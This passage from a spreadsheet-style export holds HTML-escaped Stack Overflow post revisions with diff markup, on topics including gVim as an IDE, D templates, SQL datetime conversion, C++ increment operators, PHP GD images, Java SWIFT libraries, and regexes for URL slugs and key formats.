 &lt;p&gt; I used &lt;span class="diff-delete"&gt;gVim&lt;/span&gt; because I had some (but not much) prior experience there, I can't say anything at all about Emacs or alternatives. I find it really helps to read other peoples' &lt;code&gt;.gvimrc&lt;/code&gt; config file. Many people put it on the web. Here's &lt;a href="http://page.mi.fu-berlin.de/krudolph/stuff/gvimrc.html" rel="nofollow noreferrer"&gt;mine&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;p&gt; Syntax highlighting: yes, and a much better one than Visual Studio. Code completion: yes-&lt;em&gt;ish&lt;/em&gt;. First, I have to admit that I didn't use C++ code completion even in Visual Studio because (compared to VB&lt;span class="diff-delete"&gt;.NET&lt;/span&gt; and C#) it wasn't good enough. I don't use it often now but nevertheless, &lt;span class="diff-delete"&gt;gVim&lt;/span&gt; &lt;em&gt;has&lt;/em&gt; native code completion support for C++. Combined with the &lt;a href="http://ctags.sourceforge.net/" rel="nofollow noreferrer"&gt;ctags&lt;/a&gt; library and a plug-in like &lt;a href="http://vim-taglist.sourceforge.net/" rel="nofollow noreferrer"&gt;taglist&lt;/a&gt; this is almost an IDE.&lt;/p&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; &lt;span class="diff-delete"&gt;Do&lt;/span&gt; you have to compile first before getting (syntax) errors?&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; and how do you debug (again think breakpoints etc&lt;span class="diff-delete"&gt;.&lt;/span&gt;)?&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Like I said, I had the 'pleasure' to set my first steps in the Java programming language using &lt;span class="diff-delete"&gt;Windows Notepad&lt;/span&gt; and the command line &lt;span class="diff-delete"&gt;Java&lt;/span&gt; compiler in high school, and it was, .. &lt;span class="diff-delete"&gt;well&lt;/span&gt; a nightmare! certainly when I could compare it with other programming courses I had back then where we had decent IDE's&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; You shouldn't even try to compare a modern, full-feature editor like Emacs or &lt;span class="diff-delete"&gt;gVim&lt;/span&gt; to Notepad. Notepad is an embellished &lt;code&gt;TextBox&lt;/code&gt; control, and this really makes all the difference. Additionally, working on the command line is a very different experience in Linux and Windows. The Windows &lt;code&gt;cmd.exe&lt;/code&gt; is severely crippled. PowerShell is much better.&lt;/p&gt; _x000D_
 &lt;p&gt;/EDIT: I should mention explicitly that &lt;strong&gt;&lt;span class="diff-delete"&gt;gVim&lt;/span&gt; has tabbed editing&lt;/strong&gt; (as in tabbed browsing, not tabs-vs-spaces)! It took me ages to find them although they're not hidden at all. Just type &lt;code&gt;:tabe&lt;/code&gt; instead of plain &lt;code&gt;:e&lt;/code&gt; when opening a file or creating a new one, and &lt;span class="diff-delete"&gt;gVim&lt;/span&gt; will create a new tab. Switching between tabs can be done using the cursor or several different shortcuts (depending on the platform). The key &lt;code&gt;gt&lt;/code&gt; (type &lt;kbd&gt;&lt;span class="diff-delete"&gt;g&lt;/span&gt;&lt;/kbd&gt;, then &lt;kbd&gt;&lt;span class="diff-delete"&gt;t&lt;/span&gt;&lt;/kbd&gt; in command mode) should work everywhere, and jumps to the next tab, or tab no. &lt;em&gt;n&lt;/em&gt; if a number was given. Type &lt;code&gt;:help gt&lt;/code&gt; to get more help.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; &lt;span class="diff-add"&gt;could&lt;/span&gt; you clarify a little bit more how it was for you, what you had to change. Maybe you could point me in the right direction by providing some links to the information you used.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;p&gt; Depending on the platform, they're quite well-written and can also be found on the &lt;span class="diff-add"&gt;internet&lt;/span&gt;. In the case of &lt;code&gt;make&lt;/code&gt;, I actually read the complete &lt;a href="http://www.gnu.org/software/make/manual/make.html" rel="nofollow noreferrer"&gt;documentation&lt;/a&gt; which took a few hours. Actually, I don't think this is necessary or helpful in most cases but I had a few special requirements in my first assignments under Linux that required a sophisticated makefile. After writing the makefile I gave it to an experienced colleague who did some minor tweaks and corrections. After that, I pretty much knew &lt;code&gt;make&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; I used &lt;span class="diff-add"&gt;GVIM&lt;/span&gt; because I had some (but not much) prior experience there, I can't say anything at all about Emacs or alternatives. I find it really helps to read other peoples' &lt;code&gt;.gvimrc&lt;/code&gt; config file. Many people put it on the web. Here's &lt;a href="http://page.mi.fu-berlin.de/krudolph/stuff/gvimrc.html" rel="nofollow noreferrer"&gt;mine&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;p&gt; Syntax highlighting: yes, and a much better one than Visual Studio. Code completion: yes-&lt;em&gt;ish&lt;/em&gt;. First, I have to admit that I didn't use C++ code completion even in Visual Studio because (compared to VB and C#) it wasn't good enough. I don't use it often now but nevertheless, &lt;span class="diff-add"&gt;GVIM&lt;/span&gt; &lt;em&gt;has&lt;/em&gt; native code completion support for C++. Combined with the &lt;a href="http://ctags.sourceforge.net/" rel="nofollow noreferrer"&gt;ctags&lt;/a&gt; library and a plug-in like &lt;a href="http://vim-taglist.sourceforge.net/" rel="nofollow noreferrer"&gt;taglist&lt;/a&gt; this is almost an IDE.&lt;/p&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; &lt;span class="diff-add"&gt;do&lt;/span&gt; you have to compile first before getting (syntax) errors?&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; and how do you debug (again think breakpoints etc)?&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Like I said, I had the 'pleasure' to set my first steps in the Java programming language using &lt;span class="diff-add"&gt;windows notepad&lt;/span&gt; and the command line &lt;span class="diff-add"&gt;java&lt;/span&gt; compiler in high school, and it was, .. &lt;span class="diff-add"&gt;wel&lt;/span&gt; a nightmare! certainly when I could compare it with other programming courses I had back then where we had decent IDE's&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; You shouldn't even try to compare a modern, full-feature editor like Emacs or &lt;span class="diff-add"&gt;GVIM&lt;/span&gt; to Notepad. Notepad is an embellished &lt;code&gt;TextBox&lt;/code&gt; control, and this really makes all the difference. Additionally, working on the command line is a very different experience in Linux and Windows. The Windows &lt;code&gt;cmd.exe&lt;/code&gt; is severely crippled. PowerShell is much better.&lt;/p&gt; _x000D_
 &lt;p&gt;/EDIT: I should mention explicitly that &lt;strong&gt;&lt;span class="diff-add"&gt;GVIM&lt;/span&gt; has tabbed editing&lt;/strong&gt; (as in tabbed browsing, not tabs-vs-spaces)! It took me ages to find them although they're not hidden at all. Just type &lt;code&gt;:tabe&lt;/code&gt; instead of plain &lt;code&gt;:e&lt;/code&gt; when opening a file or creating a new one, and &lt;span class="diff-add"&gt;GVIM&lt;/span&gt; will create a new tab. Switching between tabs can be done using the cursor or several different shortcuts (depending on the platform). The key &lt;code&gt;gt&lt;/code&gt; (type &lt;code&gt;&lt;span class="diff-add"&gt;g&lt;/span&gt;&lt;/code&gt;, then &lt;code&gt;&lt;span class="diff-add"&gt;t&lt;/span&gt;&lt;/code&gt; in command mode) should work everywhere, and jumps to the next tab, or tab no. &lt;em&gt;n&lt;/em&gt; if a number was given. Type &lt;code&gt;:help gt&lt;/code&gt; to get more help.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Konrad Rudolph</t>
  </si>
  <si>
    <t>Hubert Kario</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;h1&gt;&lt;a href="http://www.digitalmars.com/d/2.0/template-comparison.html" rel="nofollow noreferrer"&gt;D Templates: Functional&lt;/a&gt;&lt;/h1&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;template factorial(int n : 1)_x000D_
{_x000D_
  const factorial = 1;_x000D_
}_x000D_
_x000D_
template factorial(int n)_x000D_
{_x000D_
  const factorial =_x000D_
     n * factorial!(n-1);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Used like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;factorial!(5)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; The interesting thing about this one, is it computed at compile time.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;h1&gt;&lt;a href="http://www.digitalmars.com/d/2.0/template-comparison.html" rel="nofollow noreferrer"&gt;D Templates: Functional&lt;/a&gt;&lt;/h1&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;template factorial(int n : 1)_x000D_
{_x000D_
  const factorial = 1;_x000D_
}_x000D_
_x000D_
template factorial(int n)_x000D_
{_x000D_
  const factorial =_x000D_
     n * factorial!(n-1);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Used like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;factorial!(5)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Brad Gilbert</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What is the best way to convert a UTC datetime into local datetime. It isn't as simple as a getutcdate() and getdate() difference because the difference changes depending on what the date is.&lt;/p&gt; _x000D_
 &lt;p&gt; CLR integration isn't an option for me either.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What is the best way to convert a UTC datetime into local datetime. It isn't as simple as a getutcdate() and getdate() difference because the difference changes depending on what the date is.&lt;/p&gt; _x000D_
 &lt;p&gt; CLR integration isn't an option for me either.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; The solution that I had come up with for this problem a few months back was to have a daylight savings time table that stored the beginning and ending daylight savings days for the next 100 or so years, this solution seemed inelegant but conversions were quick (simple table lookup)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jon Erickson</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; We looked at this answer for C in this question:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://stackoverflow.com/questions/24886/is-there-a-performance-difference-between-i-and-i-in-c"&gt;Is there a performance difference between i++ and ++i in C?&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; What's the answer for C++?&lt;/p&gt; _x000D_
 &lt;p&gt; [executive summary: prefer ++i]&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; ~~ &lt;/span&gt;&lt;a href="http://stackoverflow.com/users/116/mark-harrison" title="Feedback welcomed!  email address on user page."&gt;&lt;span class="diff-delete"&gt;Mark Harrison&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; ~~&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; We looked at this answer for C in this question:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://stackoverflow.com/questions/24886/is-there-a-performance-difference-between-i-and-i-in-c"&gt;Is there a performance difference between i++ and ++i in C?&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; What's the answer for C++?&lt;/p&gt; _x000D_
 &lt;p&gt; [executive summary: prefer ++i]&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Greg Rogers</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; [Executive Summary: Use ++i if you don't have a specific reason to use i++.]&lt;/p&gt; _x000D_
 &lt;p&gt; For C++, the answer is a bit more complicated.&lt;/p&gt; _x000D_
 &lt;p&gt; If i is a simple type (not an instance of a C++ class) then the answer given for C holds, since the compiler is generating the code.&lt;/p&gt; _x000D_
 &lt;p&gt; However, if i is an instance of a C++ class, then i++ and ++i are making calls to the operator++() function. Here's a standard pair of these functions:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cpp s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;const&lt;/span&gt; Foo&amp;amp; Foo::&lt;span class="hljs-keyword"&gt;operator&lt;/span&gt;++() &lt;span class="hljs-comment"&gt;// called for ++i&lt;/span&gt;_x000D_
{_x000D_
    &lt;span class="hljs-keyword"&gt;this&lt;/span&gt;-&amp;gt;mydata += &lt;span class="hljs-number"&gt;1&lt;/span&gt;;_x000D_
    &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; *&lt;span class="hljs-keyword"&gt;this&lt;/span&gt;;_x000D_
}_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;const&lt;/span&gt; Foo Foo::&lt;span class="hljs-keyword"&gt;operator&lt;/span&gt;++(&lt;span class="hljs-keyword"&gt;int&lt;/span&gt;)  &lt;span class="hljs-comment"&gt;// called for i++&lt;/span&gt;_x000D_
{_x000D_
    &lt;span class="hljs-function"&gt;Foo &lt;span class="hljs-title"&gt;tmp&lt;/span&gt;&lt;span class="hljs-params"&gt;(*&lt;span class="hljs-keyword"&gt;this&lt;/span&gt;)&lt;/span&gt;&lt;/span&gt;;   &lt;span class="hljs-comment"&gt;//*** variable "tmp" cannot be optimized away by the compiler&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;this&lt;/span&gt;-&amp;gt;data += &lt;span class="hljs-number"&gt;1&lt;/span&gt;;_x000D_
    &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; tmp;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Since the compiler isn't generating code, but just calling the operator++ function, there is no way to optimize away the tmp variable and its associated copy constructor. If the copy constructor is expensive then this can have a significant performance impact.&lt;/p&gt; _x000D_
 &lt;p&gt;(thanks to &lt;a href="http://stackoverflow.com/users/1687/paul"&gt;Paul&lt;/a&gt; for inquiring about the difference between C and C++.)&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; ~~ &lt;/span&gt;&lt;a href="http://stackoverflow.com/users/116/mark-harrison" title="Feedback welcomed!  email address on user page."&gt;&lt;span class="diff-delete"&gt;Mark Harrison&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; ~~&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; [Executive Summary: Use ++i if you don't have a specific reason to use i++.]&lt;/p&gt; _x000D_
 &lt;p&gt; For C++, the answer is a bit more complicated.&lt;/p&gt; _x000D_
 &lt;p&gt; If i is a simple type (not an instance of a C++ class) then the answer given for C holds, since the compiler is generating the code.&lt;/p&gt; _x000D_
 &lt;p&gt; However, if i is an instance of a C++ class, then i++ and ++i are making calls to the operator++() function. Here's a standard pair of these functions:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cpp s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;const&lt;/span&gt; Foo&amp;amp; Foo::&lt;span class="hljs-keyword"&gt;operator&lt;/span&gt;++() &lt;span class="hljs-comment"&gt;// called for ++i&lt;/span&gt;_x000D_
{_x000D_
    &lt;span class="hljs-keyword"&gt;this&lt;/span&gt;-&amp;gt;mydata += &lt;span class="hljs-number"&gt;1&lt;/span&gt;;_x000D_
    &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; *&lt;span class="hljs-keyword"&gt;this&lt;/span&gt;;_x000D_
}_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;const&lt;/span&gt; Foo Foo::&lt;span class="hljs-keyword"&gt;operator&lt;/span&gt;++(&lt;span class="hljs-keyword"&gt;int&lt;/span&gt;)  &lt;span class="hljs-comment"&gt;// called for i++&lt;/span&gt;_x000D_
{_x000D_
    &lt;span class="hljs-function"&gt;Foo &lt;span class="hljs-title"&gt;tmp&lt;/span&gt;&lt;span class="hljs-params"&gt;(*&lt;span class="hljs-keyword"&gt;this&lt;/span&gt;)&lt;/span&gt;&lt;/span&gt;;   &lt;span class="hljs-comment"&gt;//*** variable "tmp" cannot be optimized away by the compiler&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;this&lt;/span&gt;-&amp;gt;data += &lt;span class="hljs-number"&gt;1&lt;/span&gt;;_x000D_
    &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; tmp;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Since the compiler isn't generating code, but just calling the operator++ function, there is no way to optimize away the tmp variable and its associated copy constructor. If the copy constructor is expensive then this can have a significant performance impact.&lt;/p&gt; _x000D_
 &lt;p&gt;(thanks to &lt;a href="http://stackoverflow.com/users/1687/paul"&gt;Paul&lt;/a&gt; for inquiring about the difference between C and C++.)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>JoeG</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I prefer the &lt;a href="http://www.php.net/gd" rel="nofollow noreferrer"&gt;GD library&lt;/a&gt; - check out &lt;a href="http://www.php.net/manual/en/image.examples.php" rel="nofollow noreferrer"&gt;the Examples&lt;/a&gt;, and this example:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php_x000D_
header ("Content-type: image/png");_x000D_
$im = @imagecreatetruecolor(120, 20)_x000D_
      or die("Cannot Initialize new GD image stream");_x000D_
$text_color = imagecolorallocate($im, 233, 14, 91);_x000D_
imagestring($im, 1, 5, 5,  "A Simple Text String", $text_color);_x000D_
imagepng($im);_x000D_
imagedestroy($im);_x000D_
?&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Outputs:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://uk2.php.net/manual/en/figures/image.imagecreatetruecolor.png" rel="nofollow noreferrer"&gt;imagecreatetrucolor example http://uk2.php.net/manual/en/figures/image.imagecreatetruecolor.png&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; See &lt;a href="http://www.php.net/manual/en/function.imagecreatetruecolor.php" rel="nofollow noreferrer"&gt;imagecreatetruecolor&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://kevinx.net/labs/php/badge.php?c=g&amp;amp;txt=PHP%20Image%20Master" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;alt text http://kevinx.net/labs/php/badge.php?c=g&amp;amp;txt=PHP%20Image%20Master&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I prefer the &lt;a href="http://www.php.net/gd" rel="nofollow noreferrer"&gt;GD library&lt;/a&gt; - check out &lt;a href="http://www.php.net/manual/en/image.examples.php" rel="nofollow noreferrer"&gt;the Examples&lt;/a&gt;, and this example:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php_x000D_
header ("Content-type: image/png");_x000D_
$im = @imagecreatetruecolor(120, 20)_x000D_
      or die("Cannot Initialize new GD image stream");_x000D_
$text_color = imagecolorallocate($im, 233, 14, 91);_x000D_
imagestring($im, 1, 5, 5,  "A Simple Text String", $text_color);_x000D_
imagepng($im);_x000D_
imagedestroy($im);_x000D_
?&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Outputs:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://uk2.php.net/manual/en/figures/image.imagecreatetruecolor.png" rel="nofollow noreferrer"&gt;imagecreatetrucolor example http://uk2.php.net/manual/en/figures/image.imagecreatetruecolor.png&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; See &lt;a href="http://www.php.net/manual/en/function.imagecreatetruecolor.php" rel="nofollow noreferrer"&gt;imagecreatetruecolor&lt;/a&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ross</t>
  </si>
  <si>
    <t>Shawn</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm looking for a Java library for SWIFT messages. I want to&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; parse SWIFT messages into an object model&lt;/li&gt; _x000D_
  &lt;li&gt; validate SWIFT messages (including SWIFT network validation rules)&lt;/li&gt; _x000D_
  &lt;li&gt; build / change SWIFT messages by using an object model&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Theoretically, I need to support all SWIFT message types. But at the moment I need MT103+, MT199, MT502, MT509, MT515 and MT535.&lt;/p&gt; _x000D_
 &lt;p&gt; So far I've looked at two libraries&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; AnaSys Message Objects (&lt;a href="http://www.anasys.com/products/messageobjects/" rel="nofollow noreferrer"&gt;link text&lt;/a&gt;)&lt;/li&gt; _x000D_
  &lt;li&gt; Datamation SWIFT Message Suite (&lt;a href="http://www.paymentcomponents.com/swift/message_suite/components_suite.html" rel="nofollow noreferrer"&gt;link text&lt;/a&gt;)&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Both libraries allow to accomplish the tasks mentioned above but in both cases I'm not really happy.&lt;/p&gt; _x000D_
 &lt;p&gt; AnaSys uses a internal XML representation for all SWIFT messages which you need to know in order to access the fields of a message. And you need to operate on the DOM of the XML representation, there is no way to say "get the contents of field '50K' of the SWIFT message".&lt;/p&gt; _x000D_
 &lt;p&gt; And the Datamation library seems to have the nicer API but does not find all errors.&lt;/p&gt; _x000D_
 &lt;p&gt; So does anyone know other SWIFT libraries to use?&lt;span class="diff-delete"&gt; Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­Â­&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm looking for a Java library for SWIFT messages. I want to&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; parse SWIFT messages into an object model&lt;/li&gt; _x000D_
  &lt;li&gt; validate SWIFT messages (including SWIFT network validation rules)&lt;/li&gt; _x000D_
  &lt;li&gt; build / change SWIFT messages by using an object model&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Theoretically, I need to support all SWIFT message types. But at the moment I need MT103+, MT199, MT502, MT509, MT515 and MT535.&lt;/p&gt; _x000D_
 &lt;p&gt; So far I've looked at two libraries&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; AnaSys Message Objects (&lt;a href="http://www.anasys.com/products/messageobjects/" rel="nofollow noreferrer"&gt;link text&lt;/a&gt;)&lt;/li&gt; _x000D_
  &lt;li&gt; Datamation SWIFT Message Suite (&lt;a href="http://www.paymentcomponents.com/swift/message_suite/components_suite.html" rel="nofollow noreferrer"&gt;link text&lt;/a&gt;)&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Both libraries allow to accomplish the tasks mentioned above but in both cases I'm not really happy.&lt;/p&gt; _x000D_
 &lt;p&gt; AnaSys uses a internal XML representation for all SWIFT messages which you need to know in order to access the fields of a message. And you need to operate on the DOM of the XML representation, there is no way to say "get the contents of field '50K' of the SWIFT message".&lt;/p&gt; _x000D_
 &lt;p&gt; And the Datamation library seems to have the nicer API but does not find all errors.&lt;/p&gt; _x000D_
 &lt;p&gt; So does anyone know other SWIFT libraries to use?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Eric Aya</t>
  </si>
  <si>
    <t>É¢Ê€á´œÉ´á´›</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What is a good complete Regex or some other process that would take "How do you change a title to be part of the url like Stackoverflow?" and turn it into "how-do-you-change-a-title-to-be-part-of-the-url-like-stackoverflow" that is used in the smart urls?&lt;/p&gt; _x000D_
 &lt;p&gt; The dev environment is I am using is Rails but if there are some other platform specific solutions (.net, php, django), I would love to see those too. I am sure I (or another reader) will come across the same problem on a different platform down the line.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What is a good complete Regex or some other process that would take "How do you change a title to be part of the url like Stackoverflow?" and turn it into "how-do-you-change-a-title-to-be-part-of-the-url-like-stackoverflow" that is used in the smart urls?&lt;/p&gt; _x000D_
 &lt;p&gt; The dev environment is I am using is Rails but if there are some other platform specific solutions (.net, php, django), I would love to see those too. I am sure I (or another reader) will come across the same problem on a different platform down the line.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt;-- edit --&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I am using custom routes, I am just want to know how to alter the string to all special chars are removed, it's all lowercase, and all whitespace is replaced.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>sparkes</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; After reviewing your question and the answers given, I came up with this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;RegexOptions options = RegexOptions.None;_x000D_
Regex regex = new Regex(@"([ABCDEFGHJKLMNPQRSTVXYZ0123456789]{8}&lt;span class="diff-delete"&gt;-?&lt;/span&gt;)&lt;span class="diff-delete"&gt;{3}&lt;/span&gt;", options);_x000D_
string input = @"H3Y5NC8E-TGA5B6SB-2NVAQ4E0";_x000D_
_x000D_
MatchCollection matches = regex.Matches(input);_x000D_
for (int i = 0; i != matches.Count; ++i)_x000D_
{_x000D_
    string match = matches[i].Value;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Since the "-" is optional, you don't need to include it. I am not sure what you was using the {4} at the end for? This will find the matches based on what you want, then using the MatchCollection you can access each match to rebuild the string&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Edit&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; Changed it to match it as a group. Sorry misread the question&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; After reviewing your question and the answers given, I came up with this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;RegexOptions options = RegexOptions.None;_x000D_
Regex regex = new Regex(@"([ABCDEFGHJKLMNPQRSTVXYZ0123456789]{8})", options);_x000D_
string input = @"H3Y5NC8E-TGA5B6SB-2NVAQ4E0";_x000D_
_x000D_
MatchCollection matches = regex.Matches(input);_x000D_
for (int i = 0; i != matches.Count; ++i)_x000D_
{_x000D_
    string match = matches[i].Value;_x000D_
}_x000D_
